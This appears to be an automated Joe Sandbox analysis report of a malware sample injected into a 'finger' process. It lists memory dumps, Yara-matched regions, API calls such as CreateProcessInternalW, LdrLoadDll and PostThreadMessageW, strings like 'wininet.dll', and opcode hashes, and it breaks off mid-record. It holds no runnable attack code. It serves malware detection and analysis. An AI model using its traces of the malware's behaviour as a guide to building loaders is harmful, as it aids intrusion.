                                                                                                                                            • Instruction ID: 0ab461ff76262f8a773eeca5f719cdca4a486d577d645a7395944a09155c0270
                                                                                                                                            • Opcode Fuzzy Hash: 4c80f20a755a0d4715f283cbf5a27d563cc0698b7ac000a74dc6e302f156e82a
                                                                                                                                            • Instruction Fuzzy Hash: 8690023120140853D111B1585504707000D87D0241F96C423A0424558D979B8A52A231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: e2772b5a5b346d5946aeb94c02f3e312d029fb044a36af708a0ccbe63652a041
                                                                                                                                            • Instruction ID: 30a7953483c9ad8dbf6986af496f42a81d1e92e9d2ec00349c8141bb10458d5c
                                                                                                                                            • Opcode Fuzzy Hash: e2772b5a5b346d5946aeb94c02f3e312d029fb044a36af708a0ccbe63652a041
                                                                                                                                            • Instruction Fuzzy Hash: 6A900221242445925545F1585404507400A97E0241796C023A1414950C866B9956D731
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 5ade96c9e76a974ebfc1b07b7516f2850e162fc44762a73ca22306683651d591
                                                                                                                                            • Instruction ID: e217091e4798eb4c314c86b274b8df117f29879d454ed6a0abe09b5f42369a8c
                                                                                                                                            • Opcode Fuzzy Hash: 5ade96c9e76a974ebfc1b07b7516f2850e162fc44762a73ca22306683651d591
                                                                                                                                            • Instruction Fuzzy Hash: C790022130140443D140B15864186064009D7E1301F56D022E0414554CDA5A89565332
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7549c6d75ae560dddd3ba0ccd6d551cf2c6945bb3239afd2d5d32058a763ea9f
                                                                                                                                            • Instruction ID: 003e5cb2fcc31de4a79020ae0c08b0b383cfe68861e09177970f936bb558728c
                                                                                                                                            • Opcode Fuzzy Hash: 7549c6d75ae560dddd3ba0ccd6d551cf2c6945bb3239afd2d5d32058a763ea9f
                                                                                                                                            • Instruction Fuzzy Hash: 8B90022921340442D180B158640860A000987D1202F96D426A0015558CCA5A89695331
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 71bf4ca35f43be0c81141fbc72e12bc737d93ce3ff172adbdb59d6608eeeb6b7
                                                                                                                                            • Instruction ID: be70d8e54c2d3814a662360860a8bb7053c6d1ba22305ee8df22334d41752c8b
                                                                                                                                            • Opcode Fuzzy Hash: 71bf4ca35f43be0c81141fbc72e12bc737d93ce3ff172adbdb59d6608eeeb6b7
                                                                                                                                            • Instruction Fuzzy Hash: 5390023120140842D100B5986408646000987E0301F56D022A5024555EC7AA89916231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 82674dcb3f7f1324b28230004dee51ca909989fa8b1efed3607d9b81f7ccdcc7
                                                                                                                                            • Instruction ID: 0f387d99df74ae412d7ebb2a3b260bfedd6e4f8f4b55a32c7a25fe636555596e
                                                                                                                                            • Opcode Fuzzy Hash: 82674dcb3f7f1324b28230004dee51ca909989fa8b1efed3607d9b81f7ccdcc7
                                                                                                                                            • Instruction Fuzzy Hash: 7590023120140C82D100B1585404B46000987E0301F56C027A0124654D875AC9517631
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 0bba24b438e5326c128008d796db86e914802a9e6b11b41c459b42dfa42fc8a1
                                                                                                                                            • Instruction ID: 7a40e882ee85a9d6fba6e210c5506b285b8e6dc22703902401e3d687370b00ee
                                                                                                                                            • Opcode Fuzzy Hash: 0bba24b438e5326c128008d796db86e914802a9e6b11b41c459b42dfa42fc8a1
                                                                                                                                            • Instruction Fuzzy Hash: 3F90023120148C42D110B158940474A000987D0301F5AC422A4424658D87DA89917231
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: a9c5451ad693b00fca9065cf5b5746cb0a1b6d313cdd9d6b0d840d61218142c4
                                                                                                                                            • Instruction ID: 4fab1bfaaeb81e4acdb245de3fdf07c1cf913d17753eeeae45469b101f42fb5c
                                                                                                                                            • Opcode Fuzzy Hash: a9c5451ad693b00fca9065cf5b5746cb0a1b6d313cdd9d6b0d840d61218142c4
                                                                                                                                            • Instruction Fuzzy Hash: BE90023160550842D100B1585514706100987D0201F66C422A0424568D87DA8A5166B2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039C0000, based on PE: true
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003AED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_39c0000_finger.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7270360d6e69e1a562ba788e4d600df86d4901ba9a6ec098888ea26c3b5e46de
                                                                                                                                            • Instruction ID: cf1ab29bd9baab6cc883dfe0fb90dfc2b3868230c05fa2d881049a3c0f0ed0b9
                                                                                                                                            • Opcode Fuzzy Hash: 7270360d6e69e1a562ba788e4d600df86d4901ba9a6ec098888ea26c3b5e46de
                                                                                                                                            • Instruction Fuzzy Hash: 9590022124545542D150B15C54046164009A7E0201F56C032A0814594D869A89556331

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 434 2f5111d-2f51128 435 2f51118-2f51119 434->435 436 2f5112a-2f5112f 434->436 437 2f51101 436->437 438 2f51131-2f51143 436->438 439 2f51173-2f511da call 2f6ba70 call 2f6c480 call 2f54920 call 2f41410 call 2f62060 437->439 440 2f51103-2f51109 437->440 441 2f51145-2f5114d 438->441 442 2f51187-2f51190 call 2f6c480 438->442 461 2f511dc-2f511eb PostThreadMessageW 439->461 462 2f511fa-2f51200 439->462 444 2f5116f-2f51171 441->444 445 2f5114f-2f51151 441->445 447 2f51191 442->447 444->439 450 2f51153 445->450 451 2f5115e-2f51164 445->451 447->441 450->447 453 2f51155-2f5115d 450->453 451->444 453->451 461->462 464 2f511ed-2f511f7 461->464 464->462
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                            • Instruction ID: ba2359fa10a902209f7808fdb6bc57738cfa56173e7cc3ac528940df960c36ec
                                                                                                                                            • Opcode Fuzzy Hash: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                            • Instruction Fuzzy Hash: AA319D72A0116C7FEB10DAA4AC81FEF7F6DEB412D8F0480A9EF58A7241E5255D05CBE1

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                            • Instruction ID: d03802a36b2cf8f60f3a90df137e8517c3f54868879a2f9515b7a5d405144798
                                                                                                                                            • Opcode Fuzzy Hash: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                            • Instruction Fuzzy Hash: 1111E372C0115C7AEB11EAA09C81EFF7B7CEF426E4F0480A4FB08B7241D6295D068BB1

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 483 2f51167-2f5116b 484 2f511e1-2f511eb PostThreadMessageW 483->484 485 2f5116d-2f511da call 2f6ba70 call 2f6c480 call 2f54920 call 2f41410 call 2f62060 483->485 487 2f511ed-2f511f7 484->487 488 2f511fa-2f51200 484->488 485->488 501 2f511dc-2f511e0 485->501 487->488 501->484
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                            • Instruction ID: 7385ad6906ba27d8519f59f3afd413b8328ce766f5b53cf4b05c23561d295c73
                                                                                                                                            • Opcode Fuzzy Hash: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                            • Instruction Fuzzy Hash: 24118272D0115C7AEB11AAE09C81EEF7B7CEB416D8F048065FB04A7140E6695E068BB1

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 02F511E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                            • Instruction ID: a05143f1de323b4b97f712d90329348a66dd9538c04667fed50a718c5698b8b5
                                                                                                                                            • Opcode Fuzzy Hash: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                            • Instruction Fuzzy Hash: E1018072D0125CBAEB11AAA49C81EEF7B7CEF416D8F048065FB04B7140D6795E068BF1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                            • String ID: @J7<
                                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                                            • Opcode ID: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                            • Instruction ID: f97f90e3f5308b5d1172e5dc23104f768853e1755e21de3699631797753d7bdf
                                                                                                                                            • Opcode Fuzzy Hash: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                            • Instruction Fuzzy Hash: AB419376A002099FDB10DFD8DC809EEB7B9FF89344F108599EA05EB210D771AE458BA0
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02F63F8B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                            • Opcode ID: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                            • Instruction ID: 275363d1a2a297ac4cd64aa870639d8b2e81946dd81d032ca728e21c57cbcac4
                                                                                                                                            • Opcode Fuzzy Hash: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                            • Instruction Fuzzy Hash: 0F317EB1A01605BFD714DF64CC84FFBBBB9EB88754F404519EA19AB240C770A640CFA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                            • String ID: @J7<
                                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                                            • Opcode ID: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                            • Instruction ID: 145876bb43525551e66a03fc2c8a83ea12dd7bec0b9c3dc0e404448f66a7ccc1
                                                                                                                                            • Opcode Fuzzy Hash: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                            • Instruction Fuzzy Hash: B73141B5A0060AAFDB00DFD8DC809EEB7B9FF89344B108559EA05E7214D771EE458BA0
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F54992
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                            • Instruction ID: a8e223ec1fe48d185fa84f792c41c15103f1dbbc5c791045e94f33270e7cc6fc
                                                                                                                                            • Opcode Fuzzy Hash: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                            • Instruction Fuzzy Hash: 01215275D0415E6BDB20EE90EC96FF9BB65EF40288F040196EF5887141F732D698CB90
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F54992
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                            • Instruction ID: 24c3f8dd134c4412d71df88e75dc57649b2e997296aa825a8a72f17db7b8ae2b
                                                                                                                                            • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                            • Instruction Fuzzy Hash: D8015EB5D0020DABDF10DAE0DD56FADB779AB44348F004195AE48A7240F631EB44CB91
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,02F5870E,00000010,?,?,?,00000044,?,00000010,02F5870E,?,00000000,?), ref: 02F69D60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                            • Opcode ID: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                            • Instruction ID: f3044f88143ff526b0db849fb8b9608f209eb431a44ca14eb149e8dccb4921a2
                                                                                                                                            • Opcode Fuzzy Hash: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                            • Instruction Fuzzy Hash: 1A018CB2204509BBCB54DF99DC81EEB77AEEF8D754F518208BA09E3244D670F8518BA4
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F49E25
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                            • Instruction ID: 63bcf0031e28bdc66a68bd300d4bde6d81bd23343fd7adc0d1191ff6e361a9b1
                                                                                                                                            • Opcode Fuzzy Hash: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                            • Instruction Fuzzy Hash: ECF065733803143AE63065E9DC06FD7775DDB81BA1F140066F70CEB1C0D992B40146B5
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F49E25
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                            • Instruction ID: b609b9013737de9927eaefc0c7a363654a64b6dce62888815bb35483bb93cde4
                                                                                                                                            • Opcode Fuzzy Hash: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                            • Instruction Fuzzy Hash: F9F092763807003AE23166A8CD02F977A998B84B51F14006AF748AB1C0DDA6B4408BB9
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,02F54185,000000F4), ref: 02F69CAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                            • Opcode ID: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                            • Instruction ID: 0cb52771f5fdb33ab6698075e9aec30c0f6c4964988c6e97da285c868b2774da
                                                                                                                                            • Opcode Fuzzy Hash: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                            • Instruction Fuzzy Hash: 98E09A723002087FD610EE5ADC45FAB77AEEFCA750F104008FA08A7280DA70BC108BB9
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(02F51DE9,?,02F65BF3,02F51DE9,02F65AAF,02F65BF3,?,02F51DE9,02F65AAF,00001000,?,?,00000000), ref: 02F69C5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                            • Instruction ID: 0d01cc7ffafcd45989f79b93b78bff66a6597e80c80dd14773b0416d96d37b60
                                                                                                                                            • Opcode Fuzzy Hash: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                            • Instruction Fuzzy Hash: 50E09A722003087BCA10EE59DC85FAB77AEEFC9754F404408FA0CA7281DB71B8108BB8
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02F5877C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f40000_finger.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
                                                                                                                                            • Instruction ID: 9a14aa4ad80beb03053ab175616105bb078cbbea94b3e7cadad844cb626ec550
                                                                                                                                            • Opcode Fuzzy Hash: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
